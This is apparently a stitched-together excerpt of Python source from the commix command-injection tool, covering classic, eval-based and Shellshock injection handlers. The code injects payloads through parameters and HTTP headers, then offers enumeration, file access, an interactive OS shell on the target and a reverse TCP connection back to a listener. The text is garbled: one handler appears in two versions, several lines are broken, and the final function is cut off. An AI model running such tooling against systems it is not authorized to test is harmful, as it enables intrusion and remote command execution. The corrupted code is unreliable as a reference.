vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.HOST_INJECTION == True: header_name = " Host" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: if not settings.VERBOSITY_LEVEL >= 1: print "" else: checks.total_of_requests() # Print the findings to terminal. success_msg = "The" if len(found_vuln_parameter) > 0 and not "cookie" in header_name : success_msg += " " + http_request_method + "" success_msg += ('', ' (JSON)')[settings.IS_JSON] + ('', ' (SOAP/XML)')[settings.IS_XML] + the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split(" ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + str(checks.url_decode(payload)) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, timesec=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. new_line = True if settings.ENUMERATION_DONE == True : while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) #print "" break elif enumerate_again in settings.CHOICE_NO: new_line = False break elif enumerate_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) if not menu.file_access_options() and not menu.options.os_cmd and new_line: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : if settings.ENUMERATION_DONE != True: print "" while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline().replace("\n","").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.file_access_options(): # if not menu.enumeration_options(): # print "" cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) print "" # Check if defined single cmd. if menu.options.os_cmd: # if not menu.file_access_options(): # print "" cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, timesec) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace("\n","").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: if not readline_error: # Tab compliter readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True else: # Command execution results. time.sleep(timesec) response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, timesec) if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. try: shell = cb_injector.injection_results(response, TAG, cmd) shell = "".join(str(p) for p in shell) except: print "" continue if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter) if shell: html_parser = HTMLParser.HTMLParser() shell = html_parser.unescape(shell) # Update logs with executed cmds and execution results. logs.executed_command(filename, cmd, shell) if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: raise SystemExit() else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if no_result == True: if settings.VERBOSITY_LEVEL == 0: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def eb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "Results-based Command Injection" technique = "eval-based code injection technique" for item in range(0, len(settings.EXECUTION_FUNCTIONS)): settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "(" settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS url = eb_injector.warning_detection(url, http_request_method) if not settings.LOAD_SESSION: info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification(url, technique): url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, delay, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = eb_payloads.decision_alter_shell(separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = eb_payloads.decision(separator, TAG, randv1, randv2) suffix = urllib.quote(suffix) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) payload = payload + TAG + "" # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) else: payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: sys.stdout.write("\n" + settings.print_payload(payload)) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = eb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = eb_injector.referer_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) response = eb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test(payload, http_request_method, url) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate test results. shell = eb_injector.injection_test_results(response, TAG, randvcalc) if not settings.VERBOSITY_LEVEL >= 1: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total * 1.0)),2)) if shell == False: info_msg = "Testing the " + technique + "... " + "[ " + float_percent + "%" + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The (" + http_request_method + ")" success_msg += found_vuln_parameter + header_name success_msg += the_type + " is vulnerable to " + injection_type + "." print settings.print_success_msg(success_msg) print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation(url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable="True") else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input("\n" + settings.print_question_msg(question_msg)).lower() if enumerate_again in settings.CHOICE_YES: eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) print "" break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass else: if menu.enumeration_options(): eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) if not menu.file_access_options() and not menu.options.os_cmd: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : if settings.ENUMERATION_DONE != True: print "" while True: question_msg = "Do you want to access files again? [Y/n/q] > " file_access_again = raw_input(settings.print_question_msg(question_msg)).lower() if file_access_again in settings.CHOICE_YES: eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass else: if menu.file_access_options(): if not menu.enumeration_options(): print "" eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) print "" # Check if defined single cmd. if menu.options.os_cmd: if not menu.file_access_options(): print "" eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, alter_shell, filename) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " gotshell = raw_input(settings.print_question_msg(question_msg)).lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer(menu.tab_completer) # MacOSX tab compliter if getattr(readline, '__doc__', '') is not None and 'libedit' in getattr(readline, '__doc__', ''): readline.parse_and_bind("bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind("tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower() in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg(warn_msg)+ "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp() if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options(settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options() result = checks.check_reverse_tcp_options(cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = eb_injector.injection_results(response, TAG, cmd) if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The reverse TCP connection has been failed!" print settings.print_critical_msg(err_msg) else: pass else: # The main command injection exploitation. response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) if menu.options.ignore_session or\ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. shell = eb_injector.injection_results(response, TAG, cmd) shell = "".join(str(p) for p in shell).replace(" ", "", 1) if not menu.options.ignore_session : session_handler.store_cmd(url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter) #if shell: if shell != "": shell = "".join(str(p) for p in shell) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: err_msg = "The '" + cmd + "' command, does not return any output." print "\n" + settings.print_error_msg(err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) + "\n" pass if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def eb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "Results-based Command Injection" technique = "eval-based injection technique" for item in range(0, len(settings.EXECUTION_FUNCTIONS)): settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "(" settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS url = eb_injector.warning_detection(url, http_request_method) sys.stdout.write("(*) Testing the "+ technique + "... ") sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES) for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 try: # Eval-based decision payload (check if host is vulnerable). payload = eb_payloads.decision(separator, TAG, randv1, randv2) suffix = urllib.quote(suffix) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) payload = payload + "" + TAG + "" if menu.options.base64: payload = urllib.unquote(payload) payload = base64.b64encode(payload) else: payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = eb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = eb_injector.referer_injection_test(url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test(payload, http_request_method, url) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Evaluate test results. shell = eb_injector.injection_test_results(response, TAG, randvcalc) if not menu.options.verbose: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total * 1.0)),2)) if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+"%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]") sys.stdout.flush() except KeyboardInterrupt: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " Cookie" found_vuln_parameter = vuln_parameter the_type = " HTTP header" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL pass else: eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, filename) # Check for any system file access options. if settings.FILE_ACCESS_DONE == True : while True: file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower() if file_access_again in settings.CHOISE_YES: print "" eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + "(x) Error: '" + file_access_again + "' is not a valid answer." + Style.RESET_ALL pass else: eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, filename) # Check if defined single cmd. if menu.options.os_cmd: eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter, filename) # Pseudo-Terminal shell go_back = False while True: if go_back == True: break gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '?' for shell options)" while True: try: cmd = raw_input("Shell > ") if cmd.lower() in settings.SHELL_OPTIONS: if cmd.lower() == "?": menu.shell_options() elif cmd.lower() == "quit": sys.exit(0) elif cmd.lower() == "back": go_back = True if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True else: pass else: # The main command injection exploitation. response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, filename) # if need page reload if menu.options.url_reload: time.sleep(delay) response = urllib.urlopen(url) # Command execution results. shell = eb_injector.injection_results(response, TAG) if shell: shell = "".join(str(p) for p in shell).replace(" ", "", 1)[:-1] if shell != "": print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n" except KeyboardInterrupt: raise elif gotshell in settings.CHOISE_NO: if checks.check_next_attack_vector(technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOISE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL pass if no_result == True: print "" return False else : sys.stdout.write("\r") sys.stdout.flush()
def shellshock_handler(url, http_request_method, filename): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "shellshock injection technique" sys.stdout.write(settings.INFO_SIGN + "Testing the " + technique + "... ") sys.stdout.flush() try: i = 0 total = len(shellshock_cves) * len(headers) for cve in shellshock_cves: for check_header in headers: i = i + 1 attack_vector = "echo " + cve + ":Done;" payload = shellshock_payloads(cve, attack_vector) # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + settings.PAYLOAD_SIGN + payload + Style.RESET_ALL) header = {check_header: payload} request = urllib2.Request(url, None, header) response = urllib2.urlopen(request) if not menu.options.verbose: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL elif cve in percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]") sys.stdout.flush() # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vuln_parameter = "HTTP Header" vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload) logs.update_payload(filename, counter, payload) if cve in no_result = False print Style.BRIGHT + "\n(!) The (" + check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title( ) + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title( ) + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL if not menu.options.verbose: print "" # Enumeration options. if settings.ENUMERATION_DONE == True: if menu.options.verbose: print "" while True: enumerate_again = raw_input( settings.QUESTION_SIGN + "Do you want to enumerate again? [Y/n/q] > " ).lower() if enumerate_again in settings.CHOISE_YES: enumeration(url, cve, check_header, filename) break elif enumerate_again in settings.CHOISE_NO: break elif enumerate_again in settings.CHOISE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: enumeration(url, cve, check_header, filename) # File access options. if settings.FILE_ACCESS_DONE == True: while True: file_access_again = raw_input( settings.QUESTION_SIGN + "Do you want to access files again? [Y/n/q] > " ).lower() if file_access_again in settings.CHOISE_YES: file_access(url, cve, check_header, filename) break elif file_access_again in settings.CHOISE_NO: break elif file_access_again in settings.CHOISE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" print Back.RED + settings.ERROR_SIGN + "'" + file_access_again + "' is not a valid answer." + Style.RESET_ALL + "\n" pass else: file_access(url, cve, check_header, filename) if menu.options.os_cmd: cmd = menu.options.os_cmd shell = cmd_exec(url, cmd, cve, check_header, filename) print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL sys.exit(0) else: # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if settings.ENUMERATION_DONE == False and settings.FILE_ACCESS_DONE == False: if menu.options.verbose: print "" gotshell = raw_input( settings.QUESTION_SIGN + "Do you want a Pseudo-Terminal? [Y/n/q] > " ).lower() if gotshell in settings.CHOISE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": 